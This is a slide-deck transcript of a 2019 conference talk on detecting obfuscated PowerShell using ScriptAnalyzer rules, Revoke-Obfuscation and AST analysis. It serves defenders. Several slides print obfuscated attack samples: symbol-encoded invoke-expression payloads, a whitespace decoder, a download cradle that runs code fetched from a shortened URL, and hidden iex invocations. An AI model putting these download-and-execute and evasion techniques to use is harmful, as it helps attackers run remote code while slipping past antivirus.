SlideShare a Scribd company logo

PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell

D
Daniel Bohannon

Daniel Bohannon, a principal applied security researcher at FireEye, discusses novel detection techniques for obfuscated PowerShell during the PowerShell Conference EU 2019. He emphasizes the importance of developing diverse detection methods, including static detection R&D, to track attacker activities and improve response capabilities. The presentation includes insights on various obfuscation techniques and the effectiveness of traditional vs. innovative detection systems.

Technology
1 of 79
Downloaded 18 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
Daniel Bohannon (@danielhbohannon) Principal Applied Security Researcher FireEye's Advanced Practices Team PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell https://victrolacoffeeroasters.files.wordpress.com/2011/04/latte_art_pour.jpg COPYRIGHT © 2019, FIREEYE, INC. ALL RIGHTS RESERVED. 2019
PesterSec: Using Pester & ScriptAnalyzer for Detecting Obfuscated PowerShell 2019 Daniel Bohannon (@danielhbohannon)
2019 Daniel Bohannon (@danielhbohannon) PS> (ls env:User*)[1].Value • Principal Applied Security Researcher • FireEye's Advanced Practices Team • Blog: http://danielbohannon.com • I like writing detection stuff • I REALLY like writing obfuscation stuff
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
[System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role PowerShell Conference EU 2019
[System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role • Coffee connoisseur PowerShell Conference EU 2019 https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/
[System.Motivation]::GetBackground() • Background of 9 years in: • IT operations • Operational security • Incident Response consulting • Applied detection R&D at scale • 2 consistent things in each role • Coffee connoisseur • Aspiring PowerShell aficionado https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png https://www.beanthere.co.za/shop/home-brewing/chemex-coffee-maker/ PowerShell Conference EU 2019
[System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png PowerShell Conference EU 2019
[System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } PowerShell Conference EU 2019 http://haxf4rall.com/2017/12/18/invoke-psimage-tool-to-embed-powershell-scripts-in-png-image-pixels/ Attackers PowerShell
[System.Motivation]::GetBackground() • @(1..9) | % { "$_ years Working" } • @(1..7) | % { "$_ years PowerShelling" } • @(1..6) | % { "$_ years Detecting" } • @(1..3) | % { "$_ years Obfuscating" } while ($attacker.techniques -contains 'evasion') { $research = New-Research -Type Detection New-Detection -Content $research –Type @('host','network') } https://i2.wp.com/powershelldistrict.com/wp-content/uploads/2015/01/PowerShell-Hero.png PowerShell Conference EU 2019
• FireEye Advanced Practices Team • Tracking attacker activity • Researching new attacker methods • Developing detections for these methods about_FindingEvil https://cdn-images-1.medium.com/max/1600/1*pazSTVPiSkUB7w7WiDpZNA.jpeg PowerShell Conference EU 2019
Get-Evil | Sort-Object ObfuscationLevel | ogv • Slice & dice some malicious PowerShell • Highlight varying obfuscation levels & styles • Discuss trends in PowerShell obfuscation & detection efforts • Signatures vs signatureless vs targeted feature-based signatures • Novel detection approaches https://www.brafton.com/wp-content/uploads/2019/01/searching.gif PowerShell Conference EU 2019
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example PowerShell Conference EU 2019 https://media.giphy.com/media/dTGeSnz0FzufK/giphy.gif
Get-Help Invoke-((Ob|DOS)fuscation|CradleCrafter) -Example
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
Start-Process -Verb Detect -ArgumentList @('piece','by','piece') • Static detection R&D often starts with identifying numerous building blocks • Focus on multi-level detection of building blocks • Treat as either high fidelity or combination of #WeakSignals https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg PowerShell Conference EU 2019
Start-Process -Verb Detect -ArgumentList @('piece','by','piece') • Static detection R&D often starts with identifying numerous building blocks • Focus on multi-level detection of building blocks • Treat as either high fidelity or combination of #WeakSignals https://www.tibco.com/blog/wp-content/uploads/2015/05/lego.jpg PowerShell Conference EU 2019
Start-Process -Verb Detect -ArgumentList @('piece','by','piece') https://media2.giphy.com/media/vRDMuINIfLTc4/giphy.gif PowerShell Conference EU 2019 • Why this signature-based static detection when PowerShell logging is available? • Defense in depth (if PS logging disabled) • Detecting guardrailed and/or keyed PowerShell • Open Source repo detection using YARA rules • Network detection of PS transfers
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ${-'*}=+$( ); ${ }= ${-'*} ; ${(+} =++ ${-'*};${)}=(${-'*}=${-'*}+${(+} ) ; ${'/}= (${-'*} =${-'*}+ ${(+} ); ${@} = ( ${-'*}=${-'*} + ${(+}) ; ${~ =} =( ${-'*}= ${-'*}+ ${(+}); ${;} =(${-'*} =${-'*}+${(+}) ; ${+} = (${-'*}= ${-'*} + ${(+}) ; ${]} = ( ${-'*} =${-'*} + ${(+});${-}= (${-'*}=${-'*} + ${(+} ) ; ${-$.}="["+ "$( @{ }) "[${+}] +"$(@{})"["${(+}" +"${- }"]+ "$(@{} )"["${)}"+ "${ }" ] + "$? "[${(+} ] +"]";${-'*}="".("$(@{} )"[ "${(+}" + "${@}"]+"$(@{} ) "[ "${(+}" + "${;}" ]+ "$(@{} )"[ ${ }]+"$(@{ })"[ ${@}] +"$? "[${(+}]+"$(@{} ) "[${'/}]) ; ${-'*} ="$(@{ } )"[ "${(+}" + "${@}"] +"$(@{ })"[${@}]+ "${- '*}"["${)}"+"${+}"] ; "${-'*}(${-$.}${+}${'/} + ${-$.}${;}${-} +${-$.}${]}${]} + ${-$.}${'/}${)} + ${-$.}${@}${ }+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+} +${-$.}${(+}${(+}${-}+ ${-$.}${@}${~ =} + ${- $.}${+}${-} + ${-$.}${-}${]}+${-$.}${(+}${ }${;} + ${-$.}${(+}${ }${(+}+${-$.}${-}${-}+${- $.}${(+}${(+}${;}+ ${-$.}${'/}${)}+ ${-$.}${+}${]}+${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${;}+${- $.}${@}${;} +${-$.}${]}${+} + ${-$.}${(+}${ }${(+} +${-$.}${-}${]}+${-$.}${;}${+} + ${-$.}${(+}${ }${]} +${-$.}${(+}${ }${~ =} +${-$.}${(+}${ }${(+}+ ${-$.}${(+}${(+}${ }+ ${-$.}${(+}${(+}${;} + ${-$.}${@}${(+} + ${-$.}${@}${;}+${-$.}${;}${]}+ ${-$.}${(+}${(+}${(+} +${-$.}${(+}${(+}${-} + ${- $.}${(+}${(+}${ }+ ${-$.}${(+}${ }${]} + ${-$.}${(+}${(+}${(+} + ${-$.}${-}${+}+${-$.}${(+}${ }${ } +${-$.}${]}${'/}+${-$.}${(+}${(+}${;}+ ${-$.}${(+}${(+}${@}+ ${-$.}${(+}${ }${~ =} + ${- $.}${(+}${(+}${ } + ${-$.}${(+}${ }${'/}+ ${-$.}${@}${ }+ ${-$.}${'/}${-}+${-$.}${(+}${ }${@}+${- $.}${(+}${(+}${;} +${-$.}${(+}${(+}${;} + ${-$.}${(+}${(+}${)}+${-$.}${~ =}${]}+${-$.}${@}${+}+${- $.}${@}${+} + ${-$.}${-}${]}+${-$.}${(+}${ }${~ =} + ${-$.}${(+}${(+}${;} +${-$.}${@}${;}+ ${- $.}${(+}${ }${]} +${-$.}${(+}${)}${(+}+ ${-$.}${@}${+} +${-$.}${+}${;}+ ${-$.}${~ =}${(+} +${- $.}${(+}${ }${'/}+ ${-$.}${@}${-} +${-$.}${(+}${(+}${;}+${-$.}${'/}${-} + ${-$.}${@}${(+})"|. ${-'*}
Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ${ }= + $( ); ${ }= ${ } ; ${ } =++${ } ;${ }= (${ }= ${ }+${ });${ }=(${ } = ${ }+${ } ) ;${ }=( ${ }= ${ } +${ } ) ;${ } =( ${ } = ${ } +${ } );${ } = ( ${ }= ${ } +${ } ) ;${ }=( ${ }= ${ } + ${ }) ; ${ } =(${ }= ${ } +${ }); ${ } =(${ } = ${ } +${ }); ${ } = "[" +"$(@{ })"[ ${ }] + "$(@{})"[ "${ }${ }"]+ "$(@{ } )"[ "${ }${ }"] + "$? "[${ }]+"]" ; ${ } ="".("$( @{ }) "[ "${ }${ }"]+"$(@{ } )"["${ }${ }" ]+"$( @{}) "[ ${ } ]+"$(@{} ) "[ ${ } ]+ "$?"[ ${ } ] +"$(@{ }) "[ ${ }]);${ } = "$( @{} ) "[ "${ }" + "${ }" ] +"$( @{ }) "[ ${ } ]+"${ }"[ "${ }" + "${ }" ]; & ${ } ( " ${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }| ${ }")
Out-Obfuscated -Level @(999..100000) PowerShell Conference EU 2019 ' ' | % {$Script = $_ -Split '' | % {''; $_.Split('') | % {$_.Length-1}} ; $DecodedCommand = [Char[]] [Int[]]($Script[0..($Script.Length-1)] -Join '').Trim('').Split('') -Join ''; IE`X $DecodedCommand} 1000’s of whitespace & tab characters
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
about_RevokeObfuscation PowerShell Conference EU 2019 -not ($healthy -or $normal)
about_RevokeObfuscation PowerShell Conference EU 2019 Avg Char Freq of ALL 3.4K PoshCode scripts
COSINE SIMILARITY
about_RevokeObfuscation PowerShell Conference EU 2019 SAMPLE 2: Symbolic (0.157) SAMPLE 1: Invoke-Obfuscation (0.379)
about_RevokeObfuscation PowerShell Conference EU 2019 Similarity
about_RevokeObfuscation PowerShell Conference EU 2019 Similarity https://cobbr.io/ObfuscationDetection.html
about_RevokeObfuscation PowerShell Conference EU 2019 https://cobbr.io/ObfuscationDetection.html https://en.wikipedia.org/wiki/Precision_and_recall Similarity Measure Score Accuracy 0.71 Precision 0.89 Recall 0.37 F1 Score 0.52 True Positives 0.16 False Positives 0.02 True Negatives 0.55 False Negatives 0.27 https://cobbr.io/ObfuscationDetection.html
PowerShell Conference EU 2019 https://media.giphy.com/media/WWRArOTz2L3wI/200w_d.gif
Get-Command -Name ("{1}{0}" -f "-Process","Get") about_AbstractSyntaxTree PowerShell Conference EU 2019 StringExpandable RParenComma StringExpandable Format StringExpandable LParen Parameter Generic
Get-Command -Name ("{1}{0}" -f "-Process","Get") about_AbstractSyntaxTree PowerShell Conference EU 2019 StringExpandable RParenComma StringExpandable Format StringExpandable LParen Parameter Generic ScriptBlockAst NamedBlockAst: Begin NamedBlockAst: End StatementAst PipelineAst CommandAst StringConstantExpressionAst CommandParameterAst ParenExpressionAst PipelineAst BinaryExpressionAst Operator: FormatLeft: StringConstantAst Right: ArrayLiteralAst 0: StringConstantExpressionAst 1: StringConstantExpressionAst
about_LogisticRegression #MathStuff PowerShell Conference EU 2019 + = Linear Regression Logit Function Logistic Regression https://en.wikipedia.org/wiki/Logistic_regression
about_StochasticGradientDescent #MoarMathStuff PowerShell Conference EU 2019 • Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…) • ExpectedResult = (from labeled data) • Error = Result – ExpectedResult • Adjust each weight according to how much they contributed to the error. Do this a lot. https://en.wikipedia.org/wiki/Stochastic_gradient_descent
about_LeeAndDanielHappyDance PowerShell Conference EU 2019 https://en.wikipedia.org/wiki/Precision_and_recall Measure Cosine Similarity Logistic Regression with Gradient Descent Accuracy 0.71 0.96 Precision 0.89 0.96 Recall 0.37 0.94 F1 Score 0.52 0.95 True Positives 0.16 0.36 False Positives 0.02 0.01 True Negatives 0.55 0.60 False Negatives 0.27 0.02 10x better at finding obfuscated content Half the false positives
Get-Help Revoke-Obfuscation -Role PowerShell Conference EU 2019 • Revoke-Obfuscation highlights: • First AST-based PowerShell obfuscation detection framework • Signatureless data science approach • Daniel’s first “real” PowerShell module (& published to PowerShell Gallery) https://steamuserimages-a.akamaihd.net/ugc/26225809579209707/BD9801C802D330C551B79820D23BD8074DA9B75D/
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – ??? http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png PowerShell Conference EU 2019
Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – SALTY http://www.pngpix.com/wp-content/uploads/2016/06/PNGPIX-COM-Sliced-Wheat-Bread-PNG-Image.png PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – ??? • Maximum obfuscation – SALTY • ^^^ layered – EXTRA-SALTY https://steamuserimages-a.akamaihd.net/ugc/993492320936652061/35067ABF992F42EF4A7447CD39CA37A856EF08C0/ PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – TASTEFUL • Maximum obfuscation – SALTY • ^^^ layered – EXTRA-SALTY https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif
Out-Obfuscated -Level Minimal • Level & depth of obfuscation in malicious PowerShell varies wildly • No obfuscation – BLAND • Minimal obfuscation – TASTEFUL • Maximum obfuscation – SALTY https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif PowerShell Conference EU 2019 https://thumbs.gfycat.com/AnchoredAchingBighorn-size_restricted.gif Ryan Cobb (@cobbr_io)
Get-Help PSAmsi -Functionality • Using the AST (Abstract Syntax Tree) for minimal obfuscation • PSAmsi (@cobbr_io) • Uses AST to minimally obfuscate PowerShell scripts to evade specific A/V signatures • https://github.com/cobbr/PSAmsi PowerShell Conference EU 2019 https://specterops.io/who-we-are/the-team
Out-Obfuscated -Level Minimal -Type @('Quantity','Depth') • Two types of minimal obfuscation (can be combined): • Quantity – Obfuscate only 3 of the 27 script blocks • Depth – Light obfuscation of any given token PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String")
Out-Obfuscated -Level Minimal -Type @('Quantity','Depth') • Two types of minimal obfuscation (can be combined): • Quantity – Obfuscate only 3 of the 27 script blocks • Depth – Light obfuscation of any given token PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String") Targeted Token-Specific Detection Opportunity!
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInMember PowerShell Conference EU 2019
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInMember PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String")
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInMember PowerShell Conference EU 2019
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInMember PowerShell Conference EU 2019 Deep Obfuscation Shallow Obfuscation ."Do`wn`load`Str`in`g" ."Download`String" .("{1}{0}{2}" -f "load","Down","String") .("Download"+"String")
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-LongMemberValue PowerShell Conference EU 2019
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-LongMemberValue PowerShell Conference EU 2019 Deep Obfuscation (Invoke-CradleCrafter) ((((New-Object Net.WebClient)|GM)|Where-Object{(Get- Item Variable:/_).Value.Name- like'D*g'}).Name)
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInVariable PowerShell Conference EU 2019
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-TickUsageInVariable PowerShell Conference EU 2019 Invocation Obfuscation . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
PowerShell Conference EU 2019 . ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
PowerShell Conference EU 2019 . ( ${eNv:coMsPEC}[4,15,25]-JOin'' ) 27 chars
PowerShell Conference EU 2019 . ( ${eNv:coMsPEC}[4,15,25]-JOin'' ) 4 15 25
PowerShell Conference EU 2019 . 'iex' 4 15 25 https://i.imgur.com/8oXBdLG.gif
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInVariable PowerShell Conference EU 2019
Get-Help PesterSec -Examples • How can PSScriptAnalyzer help us detect minimal obfuscation? • In-depth signatures targeting specific AST node types, relationships, etc. • Measure-NonAlphanumericUsageInVariable PowerShell Conference EU 2019 Variable Obfuscation (ISE Steroids) ${____/=/==//===}
New-Item -ItemType Idea -Name PesterSec • PS> Invoke-Expression (New-Object Net.WebClient)."`D`o`wn`l`oa`d`Str`in`g"( 'ht'+'tps:/bit.ly/L3g1t') PowerShell Conference EU 2019
Get-Help PesterSec -Detailed • PSScriptAnalyzer_Obfuscation_Detection_Rules.psm1 • Measure-TickUsageInCommand • Measure-TickUsageInArgument • Measure-TickUsageInMember • Measure-TickUsageInVariable • Measure-NonAlphanumericUsageInMember • Measure-NonAlphanumericUsageInVariable • Measure-LongMemberValue • Measure-SAObfuscation.psm1 • Wrapper module for displaying aggregated ScriptAnalyzer hits PowerShell Conference EU 2019
PesterSec: Using Pester & ScriptAnalyzer to Detect Obfuscated PowerShell
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
$moduleLogs | Group-Object PipelineID,CommandName • Fingerprint abnormal scripts by cmdlet groupings • AST to query from extracted script (group on Command) • EID 4103 events for executed script (group on PipelineID,CommandName) PowerShell Conference EU 2019 # Load script to analyze. $script = Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke- Mimikatz.ps1 # Tokenize script. $tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null) # Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands. $tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
$moduleLogs | Group-Object PipelineID,CommandName • Fingerprint abnormal scripts by cmdlet groupings • AST to query from extracted script (group on Command) • EID 4103 events for executed script (group on PipelineID,CommandName) PowerShell Conference EU 2019 # Load script to analyze. $script = Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke- Mimikatz.ps1 # Tokenize script. $tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null) # Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands. $tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object { $_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name
Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 powershell.exe Invoke-Expression $env:gkwa Pipeline execution details for command line: Invoke-Expression $env:gkwa Context Information: DetailSequence=1 <REDACTED> CommandLine=Invoke-Expression $env:gkwa Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 Cmdlet invoked Parent ScriptBlock
Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 powershell.exe iex $env:gkwa Pipeline execution details for command line: iex $env:gkwa Context Information: DetailSequence=1 <REDACTED> CommandLine=iex $env:gkwa Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 Cmdlet invoked Parent ScriptBlock
Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 powershell.exe ie`x $env:gkwa Pipeline execution details for command line: ie`x $env:gkwa Context Information: DetailSequence=1 <REDACTED> CommandLine=ie`x $env:gkwa Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 Cmdlet invoked Parent ScriptBlock OBFUSCATED!
Compare-Object $oldPSLog $newPSLog PowerShell Conference EU 2019 sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' ) Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' ) Context Information: DetailSequence=1 <REDACTED> CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' ) Details: CommandInvocation(Invoke-Expression): "Invoke-Expression" ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>" Windows PowerShell – EID 800 OBFUSCATED!
$ag = New-Object System.Agenda • Enter-PSSession -Hostname INTRO • Out-Obfuscated -Level @(0..10) • .EXAMPLE IEX Detection Development • Revoke-Obfuscation #Signatureless • about_MiminalObfuscation #PSAmsi • PesterSec • <# Novel Detection Approaches #> • Exit-PSSession #Key Takeaways PowerShell Conference EU 2019
